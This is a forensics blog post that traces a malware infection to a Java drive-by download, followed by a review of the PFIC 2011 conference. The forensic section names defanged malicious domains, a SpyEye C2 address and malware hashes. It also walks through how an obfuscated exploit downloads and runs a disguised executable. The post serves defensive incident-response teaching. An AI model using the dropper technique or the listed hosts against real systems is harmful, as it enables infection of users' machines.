Finding the Initial Infection Vector

Sunday, November 20, 2011 Posted by Corey Harrell 9 comments
There are different ways to spread malware. Email, instant messaging, removable media, and websites are just a few options leveraged to infect systems. One challenge when performing an examination is determining how the malware ended up on the system, which is also referred to as identifying the malware’s initial infection vector (IIV). One obstacle in determining the IIV is that a system changes over time: files are deleted, programs are installed, temporary folders are emptied, browser history is cleared, or an antivirus program cleans the system. Every one of those changes may hinder the examination. However, they don’t necessarily prevent narrowing down the IIV since some artifacts pointing to how the infection occurred may still be present on the system.

There are various reasons given for why an examination isn’t performed on a malware infected system to locate the IIV. Instead of focusing on the reasons why people don’t, I first want to point out why taking the time to find the IIV is beneficial. The purpose of the root cause analysis is to identify the factors that led up to the infection and what needs to change to prevent a similar incident from recurring. If the infected system is just cleaned and put back into production then how can security controls be adjusted or implemented to reduce malware infecting systems in a similar manner? Let’s see how this works out when the root cause analysis is skipped and the blame is placed on a user opening a SPAM email. A new security awareness initiative educates employees on not opening SPAM email, which does very little if the malware was the result of a breakdown in the patch management process. Skipping the search for the IIV is not only a lost opportunity for security improvements but it also prevents knowing when the infection first occurred and what data may have been exposed. This applies to both organizations and individuals.

Determining how the malware infected a system is a challenge but that's not a good enough reason to not try. It may be easier to say it can’t be done, it takes too many resources, or it's not worth it since someone (aka users) never listens and did something they weren’t supposed to. As a learning opportunity I’m sharing how I identified the initial infection vector in a recent examination by showing my thought process and tool usage.

First things first… I maintain the utmost confidentiality in any work I perform whether it’s DFIR or vulnerability assessments. At times on my blog I write detailed posts about actual examinations I performed and every time I’ve requested permission to do so. This post is no different. I was told I can share the information for the greater good since it may help educate others in the DFIR community who are facing malware infected systems.

Background Information

People don’t treat me as their resident “IT guy” to fix their computer issues anymore. They now usually contact me for another reason because they are aware that I’ve been cleaning infected computers for the past year free of charge. So it’s not a strange occurrence when someone contacts me saying their friend/colleague/family member/etc appears to be infected with a virus and needs a little help. That’s pretty much how this examination came about and I wasn’t provided with any other information except for two requests:

        * Tell them how the infection occurred so they can avoid this from happening again

        * Remove the viruses from the computer

     Investigation Plan

The methodology used throughout the examination is documented on the jIIr Methodology Page. I separated the various system examination steps into the first three areas listed below.

        1. Verify the system is infected
        2. Locate all malware present on the system
        3. Identify the IIV
        4. Eradicate the malware and reset any system changes

I organized the areas so each one will build on the previous one. My initial activities were to verify that the system was actually infected as opposed to the requester interpreting a computer issue as an infection. To accomplish this I needed to locate a piece of malware on the system either through antivirus scanning or reviewing the system auto-run locations. If malware was present then the next thing I had to do was locate and document every piece of malware on the computer by: obtaining general information about the system, identifying files created around the time frame malware appeared, and reviewing the programs that executed on the system. The examination would require timeline analysis since the technique excels at highlighting malware on a system. The third area and the focus of this post was to identify the initial infection vector. The IIV is detected by looking at the system activity in the timeline around the timeframe when each piece of malware was dropped onto the system. The activity can reveal if all of the malware is from the same attack or if there were numerous attacks resulting in different malware getting dropped onto the system. The final area is to eradicate every piece of malware identified.

Note: Some activities were conducted in parallel to save time. To make it easier for people to follow my examination I identified each activity with the symbol <Step #>, the commands I ran are in bold, and registry and file paths are italicized.

Verifying the Infection

The computer’s hard drive was connected to my workstation and a software write blocker prevented the drive from being modified. I first reviewed the master boot record (MBR) to see the drive configuration I was dealing with and to check for signs of MBR malware <Step 1>. I ran the Sleuthkit command: mmls.exe -B \\.\PHYSICALDRIVE1 (the -B switch shows the size in bytes). There was nothing odd about the hard drive configuration and I found out that additional time was needed to complete the examination since I was dealing with a 500 GB hard drive. To assist with identifying known malware on the system I fired off a Kaspersky antivirus scan against the drive <Step 2>.
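For readers who want to see what a partition listing like the one from mmls is built on, the sketch below reads the four primary partition entries out of a raw MBR sector. It is an illustration only and was not part of the examination. It assumes a classic MBR layout (four 16-byte entries starting at offset 446 and the 0x55AA signature at offset 510) and 512-byte sectors; the function name parse_mbr is made up for this example.

```python
import struct

SECTOR_SIZE = 512  # assumption: 512-byte sectors


def parse_mbr(sector: bytes):
    """Return the non-empty primary partition entries from a raw MBR sector."""
    if len(sector) < 512 or sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature; not a valid MBR")
    partitions = []
    for index in range(4):
        entry = sector[446 + index * 16: 446 + (index + 1) * 16]
        boot_flag = entry[0]
        part_type = entry[4]
        # Starting LBA and sector count are little-endian 32-bit values.
        start_lba, num_sectors = struct.unpack_from("<II", entry, 8)
        if part_type == 0:  # type 0x00 marks an unused slot
            continue
        partitions.append({
            "slot": index,
            "bootable": boot_flag == 0x80,
            "type": part_type,
            "start_bytes": start_lba * SECTOR_SIZE,
            "size_bytes": num_sectors * SECTOR_SIZE,
        })
    return partitions
```

On a Windows workstation the first sector could presumably be read with something like open(r"\\.\PHYSICALDRIVE1", "rb").read(512) from an elevated prompt, with the write blocker still in place. Unexpected partition types or gaps between partitions are the kind of thing worth a closer look.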

Knowing the antivirus scan was going to take forever to complete I moved on to checking out the system’s auto-runs locations for any signs of infection. The Sysinternals AutoRuns for Windows utility was executed against the Windows folder and the only user profile on the system <Step 3>. In the auto-runs I was looking for unusual paths launching executables, misspelled file names, and unusual folders/files. It wasn’t long before I came across an executable with a random name in the HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell registry key.

The HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key also listed under Auto-runs Logon tab showed that the C:\Users\John_Doe\AppData\Roaming folder had more than just one randomly named executable. The key also showed an additional location which was the C:\Users\John_Doe\AppData\Roaming\Microsoft folder.

I added the hard drive as an evidence item in FTK Imager v3 to review the folders and executables identified by the Auto-runs utility <Step 4>. I noticed there were two additional executables located directly underneath the Roaming folder with the names iexplore.exe and java.exe. Both files had the same MD5 hash e4c2a000e715d16ec25e2b0a0fb3532f so to confirm the infection I searched for the hash in the Malware Analysis Search custom Google search. There was one search hit for VirScan.org and a few scanners flagged the file as malware (Kaspersky identified it as Trojan.Win32.FakeAV.emha). I followed a similar process to confirm that the other executables were malware as well. At this point I no longer needed the antivirus scan to finish since the infection was verified through other means. Before I moved on to manually locating all malware on the system I needed to document what my timeframe of interest was. I looked at the last modification times and creation times for all the folders/files I found. The rough timeframe spanned a few days: from 10/13/2011 1:29:34 AM to 10/08/11 11:38:48 PM. The picture below shows the last modification times for a few folders in the C:\Users\John_Doe\AppData\Roaming folder.


Locating All Malware on the System

After I verified the system was in fact infected I then proceeded to locate and document every piece of malware. First I had to shed light on the system’s configuration since it would impact how I performed my analysis <Step 5>. I used my regripper-general-os-info.bat batch file to run RegRipper against the system’s registry hives including the one profile’s NTUSER.dat hive. Below I highlighted some information and to the right of the arrow are quick notes about its significance.

        * Operating system was Windows 7 Home Premium <= affected what artifacts are available and where they are located

        * OS Install Date was Sun Feb 20 23:26:29 2011 (UTC) <= may assist with identifying activity occurring before this date

        * Timezone was Eastern Standard <= needed to understand time information

        * The registry setting NtfsDisableLastAccessUpdate was enabled <= can’t use files’ last access times since it’s not tracked (default setting in Windows 7)

        * Profilelist registry key only showed one user account besides the default ones <= focused the examination around the activity for one specific user account

       * Installer\UserData registry key showed the following programs: Microsoft Office 2010 including Outlook, iTunes v.10, QuickTime v.7.69, Adobe Reader v9.3.4, and Java(TM) 6 Update 17 <= identified applications that could have been responsible for the malware infection

       * Default browser plugin showed the default browser was Internet Explorer <= system had two web browsers (Chrome was the other) so my initial focus is on the artifacts from the default one

       * Listsoft registry key showed McAfee <= McAfee antivirus software was on the system and its logs may show additional information about the infection.
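Since the registry output is in UTC while other artifacts show local time, it helps to convert between the two before comparing timestamps. The sketch below is a minimal illustration, not something taken from the examination. It assumes a fixed UTC-5 offset for Eastern Standard Time, which is fine for a February date but ignores daylight saving time; the helper name utc_to_est is hypothetical.

```python
from datetime import datetime, timedelta, timezone

# Assumption: a fixed UTC-5 offset for Eastern Standard Time. This ignores
# daylight saving time, so it is only valid for dates outside the DST period.
EST = timezone(timedelta(hours=-5), "EST")


def utc_to_est(utc_text: str) -> datetime:
    """Parse a UTC string such as 'Sun Feb 20 23:26:29 2011' and shift it to EST."""
    parsed = datetime.strptime(utc_text, "%a %b %d %H:%M:%S %Y")
    return parsed.replace(tzinfo=timezone.utc).astimezone(EST)


install_local = utc_to_est("Sun Feb 20 23:26:29 2011")
print(install_local.isoformat())  # 2011-02-20T18:26:29-05:00
```

The October timestamps in this examination fall inside daylight saving time, so a real conversion for those would need a proper time zone database rather than a fixed offset.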

I opted for the timeline analysis technique to locate all malware on the system and the general information obtained about the system helped to narrow down the list of artifacts to incorporate into my timeline. Building a timeline on a 500 GB hard drive was going to take some time so I looked at the McAfee logs before tying up my workstation <Step 6>. I exported the McAfee logs with FTK Imager and reviewed them using Notepad ++. The last entry in the log occurred at 10/16/2011 6:50:09 PM and it logged that the file "C:\windows\system32\consrv.DLL" was detected as Generic.dx!bbd4. Working backwards, the entry before that was on 10/12/11, and numerous entries continued from there back to 10/08/11. A few detections included Generic Dropper!1cj, DNSChanger!fa, and Artemis!E4C2A000E715 and they were for files located in the folders C:\Users\John_Doe\AppData\Local\Temp\, C:\Windows\assembly\tmp\, and C:\windows\syswow64\. The flurry of McAfee detections for files other than cookies stopped at 10/8/2011 11:37:38 PM as shown in the picture below.

The McAfee log identified potential additional malware on the system and expanded my timeframe to 10/16/2011 6:50:09 PM to 10/08/11 11:37:38 PM. A significant piece of information the log highlighted was that Internet activity occurred just before the first detection. I leveraged the timeline analysis technique for the rest of the examination. I created a timeline by incorporating the following artifacts: event logs (evtx), registry hives (system, software, and ntuser), link files (win_link), prefetch files (prefetch), Internet Explorer history (iehistory), and the Master File Table (mft) <Step 7>. I ran the following command but replaced the plugin and file path for each desired artifact: log2timeline.pl -f evtx -w timeline.csv E:\Windows\System32\winevt\Logs\Application.evtx. Once my timeline was built I started my search for all malware on the system.
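A timeline covering a whole drive gets large, so trimming it to the timeframe of interest makes the review easier. The sketch below is one hedged way to do that with a CSV timeline. It assumes the file has columns named date (MM/DD/YYYY) and time (HH:MM:SS); adjust the names and formats if the timeline at hand differs. The function name rows_in_window is made up for this example.

```python
import csv
from datetime import datetime


def rows_in_window(csv_lines, start, end):
    """Return (timestamp, row) pairs inside [start, end], newest first."""
    selected = []
    for row in csv.DictReader(csv_lines):
        try:
            stamp = datetime.strptime(
                f"{row['date']} {row['time']}", "%m/%d/%Y %H:%M:%S"
            )
        except (KeyError, ValueError):
            continue  # skip rows without a parsable timestamp
        if start <= stamp <= end:
            selected.append((stamp, row))
    # Newest first so the review can proceed backwards in time.
    selected.sort(key=lambda item: item[0], reverse=True)
    return selected


# Timeframe of interest taken from the McAfee log review above.
WINDOW_START = datetime(2011, 10, 8, 23, 37, 38)
WINDOW_END = datetime(2011, 10, 16, 18, 50, 9)
```

Usage would look like opening timeline.csv with newline="" and passing the file object along with WINDOW_START and WINDOW_END. In practice it is worth widening the window a little at the early end since the activity leading up to the first detection is where the IIV tends to be.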

Identify the IIV

Locating all malware present on the system and identifying the IIV are not separate activities when I perform timeline analysis. The only reason I separated them was to make it easier to explain my thought process. In actuality the two go hand in hand. Each time a piece of malware is located the system activity around the malware is examined to determine what contributed to the malware being created. Approaching timeline analysis in this manner will help determine if the malware is from the one attack or multiple attacks at different points in time. I review timelines working backwards in time since I find that it’s easier to spot the IIV. Each time I come across a file that could be malicious I first review the file’s header (in this examination I used FTK Imager), perform searches for the file’s MD5 hash (search order is Malware Analysis Search, VirusTotal, and then Google), and at times if the hash search results in no hits and the file type is of interest then I may upload the file to VirusTotal to see if it’s detected. I continue this process in the timeline until I reach the point where the malware activity stops and that’s usually where the IIV is located.

To assist with confirming malicious files I used FTK Imager to export a file hash list for the entire hard drive <Step 8>. It’s a lot easier to already have files’ hashes on hand than it is to calculate the hash each time I come across a new file. I started working my timeline keeping in mind everything I found including the timeframe 10/16/2011 6:50:09 PM to 10/08/11 11:37:38 PM. Besides the timestamps that were not accurate (reflecting activity in the future) the timeline ended on 10/16/2011 so that is where I started my analysis. I first saw the consrv.dll file detected by McAfee but there were no artifacts around the malware indicating it was the result of a different attack.
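The idea of building a hash list once and looking files up in it afterwards can be sketched in a few lines. This is an illustration under assumptions, not how FTK Imager produces its export: it walks a mounted or exported folder tree, and the function names are hypothetical.

```python
import hashlib
import os


def md5_of_file(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_hash_list(root):
    """Map each readable file under root to its MD5 hash."""
    hashes = {}
    for folder, _subdirs, names in os.walk(root):
        for name in names:
            path = os.path.join(folder, name)
            try:
                hashes[path] = md5_of_file(path)
            except OSError:
                continue  # locked or unreadable file; skip it
    return hashes


def find_by_hash(hashes, wanted_md5):
    """Return every path whose hash matches, e.g. to spot renamed duplicates."""
    wanted = wanted_md5.lower()
    return sorted(path for path, value in hashes.items() if value == wanted)
```

A lookup such as find_by_hash(hashes, "e4c2a000e715d16ec25e2b0a0fb3532f") would list every copy of a known bad file regardless of what it was named.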

After 10/16/11 the next activity started appearing in the timeline on 10/12/11. I found the same thing; more malware and artifacts associated with malware but no artifacts indicating an attack occurred.


I kept working the timeline going backwards in time. I kept finding more malware and malware artifacts but nothing pointing to an IIV explaining how the malware got onto the system. I finally reached the earliest time I noted which was 10/08/11 11:37:38 PM. There was a lot of activity involving files with similar names to the ones reflected in the McAfee log file.

I continued working backwards until I saw no more activity involving the C:\Windows\assembly\tmp\U\ folder which is shown in the screenshot below. The U folder was created on the system at the same time as a file resembling a configuration file. One line in the file was srv=hxxps://212.36.9.52/ and my research showed the address appeared in a blacklist and the SpyEye Tracker IP blocklist. The activity just before the U folder and configuration file were created was an executable named dbywqomgec (MD5 hash a70e5c48612159b3e936d7e478f4d451) appearing in John_Doe’s temp folder. VirusTotal showed a few antivirus programs identified the file as a dropper (Microsoft detection was TrojanDropper:Win32/Sirefef.B). Afterwards I analyzed the file with ThreatExpert to see what changes the malware caused.

The activity on the system before the dropper (MD5 hash a70e5c48612159b3e936d7e478f4d451) appeared on the system was a file showing up in the Java cache folder as shown below.

I previously discussed the forensic significance Java index files provide in the post (Almost) Cooked Up Some Java. I exported the Java index file 46e770f3-38b55d85.idx with FTK Imager and looked at the file with Notepad ++. The file’s contents are shown below.

The index file 46e770f3-38b55d85.idx showed a few interesting tidbits. First, the file 46e770f3-38b55d85 was downloaded from the URL hxxp://www.seyminck.com/FFFO009/560[dot]gif which had the IP address 212.95.55.40. Secondly, the URL indicated the file was a gif image but the index recorded the file as an application. I checked the header of the file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) and it was indeed an executable since the file started with MZ. I analyzed the file with ThreatExpert and it was identified as a dropper (Microsoft detection was TrojanDropper:Win32/Sirefef.B). The IIV still wasn’t located so I looked at the activity just before the dropper appeared in the Java cache. The activity showed that at the same time a duplicate of the dropper (MD5 hash 2e833ac26483aaad13a8051bc857ef15) appeared in John_Doe’s temp folder with the file name 0.945837921339929.exe. Four seconds beforehand a file appeared in the Java cache folder which can be seen below highlighted in red.
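The header check described above, where a file served as a gif turns out to start with MZ, is easy to script when there are many cached files to go through. The sketch below is a minimal illustration; the function names and the short list of image extensions are assumptions made for this example.

```python
def read_header(path, length=8):
    """Read the first few bytes of a file."""
    with open(path, "rb") as handle:
        return handle.read(length)


def looks_like_pe(data: bytes) -> bool:
    """True when the data starts with the 'MZ' signature used by Windows executables."""
    return data[:2] == b"MZ"


def extension_mismatch(name: str, data: bytes) -> bool:
    """Flag names that claim an image type while the header says executable."""
    image_exts = (".gif", ".jpg", ".jpeg", ".png")  # assumption: a short sample list
    return name.lower().endswith(image_exts) and looks_like_pe(data)
```

For a cached download the name to test would come from the URL recorded for it (for example 560.gif) rather than from the cache file name, since the Java cache stores files without their original extension.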

The Java index file 25e8c780-5c17647b.idx was exported with FTK Imager and read with Notepad ++. The information contained in the index showed that a Java archive file was downloaded from the URL hxxp://www.seyminck(dot)com/FFFO009/RRo/realestate (IP address 212.95.55.40). The Java archive came from the same domain and IP address as the executable located in the Java cache folder. I exported the Java archive 25e8c780-5c17647b (MD5 hash 6b478de65071d94c670a0bfa369a7890) and confirmed the file was a Jar file by examining it with JD-GUI. The MD5 hash search didn’t result in any hits so I uploaded the file to VirusTotal and only 2 out of 42 antivirus products detected it as an exploit. I wanted to know if Java actually executed around the time the exploit appeared in the cache. I exported and reviewed the Java log file C:\Users\John_Doe\AppData\Local\Temp\java_install_reg.log and the log showed Java did in fact execute.

The last piece I needed to identify the IIV was to determine what delivered the exploit to the system. The activity on the system before the exploit answered that question as shown below.

There was a PrivacIE entry for seyminck(dot)com/FFFO009/RRo/*87354602 which means the exploit came from third party content being displayed on a website. The PrivacIE entry was mixed in with activity resembling advertisements from the user searching for someone on peoplefinder and whitepages websites. I continued working backwards in the timeline but there was no more malware activity. The IIV was identified. A user was surfing the Internet when a website visited was hosting third party content which resulted in a successful drive-by download targeting a Java vulnerability.

More Information about the IIV

The Java archive 25e8c780-5c17647b (MD5 hash 6b478de65071d94c670a0bfa369a7890) didn’t have to be examined closer in order to identify the IIV. However, I wanted to better understand how to examine Jar files since they may provide more information about the IIV and help explain some files found on the system. I debated if I should put this section in another blog post because I didn’t want people to think this activity had to be done in order to figure out the IIV. I opted to include the information since it sheds light on what occurred when the exploit was downloaded.

The code in the Jar file was obfuscated to conceal its purpose. I reached out to the Win4n6 group about any methods to automate analyzing Jar files with obfuscated code. A few members pointed me to Java de-obfuscation tools and I’m still in the process of trying to learn how to use them. Another member mentioned that Java obfuscation appears to be aimed not at making analysts’ lives difficult but at evading detection by antivirus. The person went on to say the obfuscation is usually weak so it’s relatively simple to de-obfuscate. My first reaction was it may be simple for Java programmers but it seemed impossible to me; I know nothing about Java besides the artifacts left by Java exploits. I took a shot at manually trying to see what the Jar file did by focusing on trying to follow the logic associated with the variables, class methods, and functions in the code (I don’t know the Java syntax so if I butcher the names of things such as functions then you know why).

I opened the Java archive 25e8c780-5c17647b in JD-GUI and looked at the manifest file to see that the Wall Java class gets executed first.
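A Jar file is a zip archive, so the manifest can also be read without a decompiler. The sketch below is an illustration only: it pulls the main-section attributes out of META-INF/MANIFEST.MF. Which attribute names the entry class in this particular Jar is not stated here, so the Main-Class lookup in the usage note is an assumption, and the function name read_manifest is hypothetical.

```python
import io
import zipfile


def read_manifest(jar_bytes: bytes) -> dict:
    """Return the main-section attributes of META-INF/MANIFEST.MF as a dict."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        text = jar.read("META-INF/MANIFEST.MF").decode("utf-8", errors="replace")
    attributes = {}
    last_key = None
    for line in text.splitlines():
        if not line.strip():
            break  # a blank line ends the main section
        if line.startswith(" ") and last_key:
            attributes[last_key] += line[1:]  # continuation of the previous value
            continue
        key, _, value = line.partition(":")
        last_key = key.strip()
        attributes[last_key] = value.strip()
    return attributes
```

With the exported archive read into memory, read_manifest(data).get("Main-Class") would show the entry class if the manifest declares one that way. The same zipfile object can list the class files with namelist(), which gives a quick view of the obfuscated class names before opening anything in JD-GUI.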

I extracted the Java source code by using the “Save All Sources” option in JD-GUI. I started reviewing the obfuscated source code in the Wall Java class when I saw two lines of code making a call to the Java method Muuum.kjdhfdkjg or Muuum.idufhidufh. For those who don’t know what a Java method is: it’s basically going to the Muuum class and executing the code listed under the method kjdhfdkjg or idufhidufh.

I followed the code to the Muuum class file and found out its purpose was to set a variable to contain a URL. Two variables are set to contain parts of the URL and they are then used to build the entire URL. One URL that is built is hxxp://www.seyminck.com/FFFO009/560[dot]gif and this was the URL I found in the Java index 46e770f3-38b55d85.idx showing it was where the executable file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) came from. The screenshot below shows the URL being put together.

I went back to the Wall class and kept reading the code until I came across the first Java function as shown below. The Inputstream function reads data and the data being read was coming from the Java method Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk.sodarifhsdoiufhdoiufg86fetgfyusgfyudif. I highlighted the Inputstream function in green while the Java method is highlighted in red.

I followed the code to the sodarifhsdoiufhdoiufg86fetgfyusgfyudif method. The method set the variable URL to the value contained in the variable s3 which the Wall Java class passed to the method. The method ended by returning a call to another method in the Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk class as highlighted in red below.

Next I went to the mmmm3 method which is pictured below. The first function InputStream sets the URL to read from while the second function Openstream reads the URL stored in the URL variable. I couldn’t find the code that resulted in the URL variable containing the domain hxxp://www.seyminck[dot]com. However, this was the URL the method was reading from because the Jar file didn’t reference any other websites. The method returns to the Wall class the data read from the URL.

I went back to the Wall class and continued to follow the code. The next portion I picked up on is the data read from the URL was saved to a file with an exe extension. The picture below shows the code that accomplished this and I highlighted a few areas to make it easier to see. The variable ufy highlighted in the first red box was set to contain a string with a random number ending in .exe. The next variable iioi655er5w5 (highlighted in blue) was set to contain another variable concatenated with the ufy variable at the end. This means the string contained in iioi655er5w5 ends in .exe. The function FileOutputStream writes data to a file and names the file with the string in the iioi655er5w5 variable.

The previous code explains the activity on the system immediately after the exploit was downloaded. Reading the URL hxxp://www.seyminck.com/FFFO009/560[dot]gif resulted in Java caching the file while Java also wrote the data to a file with an .exe file extension. The Java index file 46e770f3-38b55d85.idx showed that the file 46e770f3-38b55d85 (MD5 hash 2e833ac26483aaad13a8051bc857ef15) in the Java cache was read from the URL in the Java exploit. Another file with the same MD5 hash was created on the system at the same time and was named with a random number and exe as the file extension.

The bottom of the previous screenshot shows the Java method Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk.kjsf8888 being called with the variable iioi655er5w5 (which contains the filename ending in .exe) passed for the method to use. The picture below is a close up of the method call.

My journey following the code ended when I went to the kjsf8888 method in the Kkdjfhgdkfjhgkdfjhgkkkkkkkkkkkk class file. The code highlighted in green in the picture below shows the function Runtime exec executing the file named in the iioi655er5w5 variable, which is a file whose name is a random number with an .exe extension (this appears to be the file 0.945837921339929.exe found on the system). The activity on the system after 0.945837921339929.exe was created in the temp folder was another dropper (MD5 hash a70e5c48612159b3e936d7e478f4d451) showing up on the system. To me this further confirms the Jar file was successful in exploiting a vulnerability in Java and this was how the system became infected in the first place.

Summary

I went into the examination planning to perform a surgical malware removal and ended up doing a complete system rebuild due to how bad the infection was. The initial infection vector was a user surfing the Internet and coming across a website hosting third party content which resulted in a successful drive-by download targeting some Java vulnerability. Going back to the person and telling them how the infection happened makes it easier for them to change what led up to the issue. I would have done a disservice if I skipped trying to find the IIV and went back to the person with a laundry list of recommendations. Enable the firewall, use strong passwords, update anti-virus software, use caution with opening attachments, use caution clicking on links, update computer software, etc … Throwing out a laundry list of recommendations is a lost opportunity to improve security since it doesn’t address the root cause. Trying to implement five or ten recommendations is a lot harder than focusing on the one recommendation that addresses what actually caused the infection.

Identifying the IIV is a challenge worth confronting. For success one not only needs to understand the forensic artifacts located on a system and their significance but also needs to know about attack vector artifacts and how to recognize them. Being able to understand both artifact types can help in answering the question of how malware ended up on the system.

PFIC 2011 Review

Monday, November 14, 2011 Posted by Corey Harrell 2 comments
Last week I had the opportunity to attend Paraben’s Forensic Innovations Conference (PFIC). I had a great time at PFIC; from the bootcamp to the sessions to the networking opportunities. Harlan posted his experience about PFIC, Girl Unallocated shared her thoughts, and SANS Digital Forensic Case Leads discussed the conference as well. The angle I’m going to take in my post is more of a play by play about the value PFIC offers and how the experience will immediately impact my work. Here are a few of my thoughts ….

Affordability

When I’m looking at conferences and trainings the cost is one of the top two things I consider. This is especially true if I’m going to ask my employer to pick up the tab. Similar to other organizations it is extremely hard to get travel approved through my organization. As a public sector employee at times it seems like I’d have better odds getting someone’s first born than getting a request approved through the finance office. The low cost to attend PFIC made it easier for me to get people to sign off on it. The conference with one day training was only $400. The location was the Canyons Resort and attendees got cheaper rates for lodging since it’s the off-season. Rounding out the price tag were the plane flight and shuttle from the airport; both expenses were fairly reasonable. Don’t be fooled by the low costs into thinking PFIC is the equivalent of a fast food restaurant while the other conferences are fine dining. PFIC is not only an economical choice but the content covered in the bootcamp and sessions results in more bang for the buck. I like to think PFIC is the equivalent of fine dining with coupons. The cost was so reasonable that I was even going to swing the conference by myself if my employer denied my request to attend. That’s how much value I saw in the price tag especially when I compared it to other DFIR conferences.

Networking Opportunities

The one commonality I’ve seen in others’ feedback about PFIC is how the smaller conference size provides opportunities to network with speakers and other practitioners. This was my first DFIR conference so I can’t comment about conference sizes. However, I agree about the ability to talk with people from the field. Everyone was approachable during the conference without having to wait for crowds to disperse. Plus if for some reason you were unable to connect between sessions then PFIC had evening activities such as casino night and a night out in town. I met some great people at the conference and was finally able to meet a few people I had only talked to online. Going into the conference I underestimated the value in connecting with others since I was so focused on the content.

Content

Let’s be honest. A conference can be affordable and offer great networking opportunities but if the content is not up to par then the conference will be a waste of time and money. I have a very simple way to judge content; it should benefit my work in some way. This means none of the following would fit the bill: academics discussing interesting theories which have no relevance to my cases, vendors pimping some product as the only way to solve an issue, or presenters discussing a topic at such a high level there is no useful information I can apply to my work. One thing I noticed about the PFIC presenters was they are practitioners in the field discussing techniques and tools they used to address an issue. I walked away from pretty much every session feeling like I learned a few useful things and got a few ideas to research further. Harlan said in his PFIC 2011 post that “there were enough presentations along a similar vein that you could refer back to someone else's presentation in order to add relevance to what you were talking about”. I think the same thing can be said from the attendee’s perspective. I sat through several presentations on incident response and mobile devices and it seemed as if the presentations built on one another.

I pretty much picked my sessions on a topic I wanted to know more about (incident response) and another topic I wanted to get exposed to (mobile devices). There were a few presentations I picked based on the presenter but for the most part my focus was on incident response and mobile devices. PFIC had a lot more to offer including e-discovery, legal issues, and digital forensics topics but I decided to focus on two specific topics. In the end I’m glad I did since each presentation discussed a different area about the topic which gave me a better understanding. I’m not discussing every session I attended but I wanted to reflect on a few.

        Incident Response

I started PFIC by attending the Incident Response bootcamp taught by Ralph Gorgal. The overview of the process used in the session is shown below and the activities highlighted in red are what the bootcamp focused on (everything to the right of the arrows are my notes about the activity).

     * Detection => how were people made aware
     * Initial Response => initial investigation, interviews, review detection evidence, and facts that incident occurred
     * Formulate Investigation/Collection Strategy => obtain network topology and operating systems in use
     * Identify Location of Relevant Evidence => determine sources locations, system policies, and log contents
     * Evidence Preservation => physical images, logical images, and archive retrieval
     * Investigation
     * Reporting

The approach taken was for us to simulate walking into a network and trying to understand the network and what logs were available to us. To accomplish that we reviewed servers’ configurations including the impact different configuration settings have and identified where the servers were storing their logs. The Windows services explored during the bootcamp were: active directory, terminal services, internet information server (IIS), exchange, SQL, and ISA. The focus was more on following a logical flow through the network (I thought it was similar to the End to End Digital Investigation) and thinking about what kind of evidence is available and where it was located.

The bootcamp provided a thorough explanation about the thought process behind conducting log analysis during incident response. Even though the course didn’t touch on how to perform the log analysis, other sessions offered at PFIC filled the void. The first session was “We’re infected, now what? How can logs provide insight?” presented by David Nardoni and Tomas Castrejon. The session started out by first explaining what logs are, breaking down the different types of logs (network, system, security, and application), and explaining what the different log types can tell you. The rest of the session focused on using the free tools Splunk and Mandiant’s Highlighter to examine firewall and Windows event logs. I thought the presentation was put together well and the hands-on portion examining actual logs reinforced the information presented to us. The other session I attended about log analysis was “Log File Analysis in Incident Response” presented by Joe McManus. The presentation covered how web server and proxy logs can generate leads about an incident by using the open source tool Log Analysis Tool Kit (LATK). LATK helps to automate the process of log analysis by quickly showing log indicators such as top downloaders/uploaders, SQL queries, and vulnerable web page access. The session was a lab and in the hands-on portion we examined web server and proxy logs. This was another session that was well put together and I think the coolest thing about both sessions, besides the great information shared, was that free tools were used to perform log analysis.

        Mobile Devices

Mobile devices are a topic I want to become more knowledgeable about. I went into PFIC wanting to learn a basic understanding about the forensic value contained in mobile devices and get some hands on experience examining them.

The first of the three Paraben labs I attended was “Smartphone and Tablet Forensic Processing” by Amber Schroader. This wasn’t my scheduled lab so I watched from the back as others did the hands-on portion. Amber laid out a case study for the attendees who had to locate a missing 15 year old girl by using Device Seizure to examine an iPad and iTouch. What I liked about the session was that answers weren’t provided to the audience which forced them to figure out what information on those devices could help locate the girl. A few of the areas examined included: Safari browsing history, Safari download history, YouTube history, FaceTime history, Wi-Fi locations, and pictures. After the case study Amber laid out the different areas on mobile devices containing relevant information but mentioned the biggest issue with mobiles is the sheer number of apps which changes how you look at your data.

The next Paraben lab I sat through was “Physical Acquisitions of Mobiles” by Diane Barrett. The session explained the different methods to acquire a physical image which were chip off, JTAG test access port, flasher boxes, and logical software that can do physical. The cool part about the session was the hands-on portion since we used a Tornado flasher box and Device Seizure to acquire a physical image from a Motorola phone.

The last Paraben lab I attended was “Introduction to Device Seizure” by Amber Schroader and Eric Montellese. As the title indicates the session was an introduction on how Device Seizure can be used to examine mobile devices. The entire session was pretty much hands-on; we performed logical and physical acquisitions of a Motorola phone and a logical acquisition of an Android. We also briefly examined both devices to see what information was available.

The only non-Paraben session about mobile devices I attended was iOS Forensics by Ben Lemere. The presentation discussed how to perform forensics on iOS devices using free tools. The information provided was interesting and added to my to-do list but I thought the session would have been better if it was a lab. It would have been awesome to try out the stuff the presenter was talking about.

        Digital Forensic Topics

I couldn’t come up with a better description than Digital Forensics Topics for the sessions I picked based on the presenter or topic. The one session I wanted to mention in this category was Scanning for Low Hanging Fruit in an Investigation by Harlan Carvey. I was really interested in attending Harlan’s session so I could finally see the forensic scanner he has been talking about. Out of all of the sessions I attended I think this was the only session where I knew about the topic being discussed (I follow Harlan’s blog and he has been discussing his forensic scanner). Harlan explained how the scanner is an engine that runs a series of checks searching for low hanging fruit (known artifacts on the system). The usage scenario he laid out involves:

     * Mount an acquired image as a volume (or mount a volume shadow copy)
     * Plug-ins (checks) are based on a specific usage profile
     * Scanner reports are generated including a log of activity (analyst’s name, image details, plugins run, etc.)

